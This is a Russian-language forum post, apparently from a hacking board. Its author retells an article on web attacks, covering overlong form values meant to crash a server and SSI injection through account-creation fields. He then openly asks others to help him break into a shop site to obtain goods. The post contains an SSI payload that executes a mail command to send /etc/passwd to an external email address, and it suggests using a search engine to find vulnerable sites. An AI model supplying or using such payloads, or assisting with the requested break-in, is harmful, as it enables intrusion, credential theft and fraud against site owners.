Нет Че Гевара там ничего такого ненаписано я изложил в этой статейке всё что там написали ну вот дополнение
из неё.
Ещё одной формой атаки является использование длинных значений в полях страницы. Во время разработки устонавливается определённый размер поля, но атакующий может увеличить его, например, до 70 000 символов и послать длинную строку которая вполне способна вызвать крах сервера или, по крайней мере, возвратит неожиданный результат.
Это всё что было написано. Но сам факт парни что ведь можножи купить подишовки только надо проработать схему покупки тоесть взломать сайт. Ну что помогите мне с осуществлением плана такого.
Сделай те запрос на
www.altavista.com и посмотрите сколько сайтов уязвимых там. Насчёт файла
www.sait.ru/password.txt такого файла там вообще нет.
Атака заключается в следующем если вы не поняли:
Вставка кода SSI в поле страницы который трактуется web-сервером как документ html. В результате появляется возможность локального исполнения команд. Поправте если неправильно.
Так точно я продолжу. Например вставка SSI в первое или последнее поле во время созданияновой учётной записи приведёт к томуб что web-сервер попытается исполнить указанное выражение . Приведём пример кодаSSI который пересылает хакеру пароли по электронной почти.
<! --#exec cmd="/bin/mail
htgms@mail.ru < cat /etc/passwd"-->
Вот и всё впринципе помогите с покупкой или взломом теперь уже неизвесно с чем.
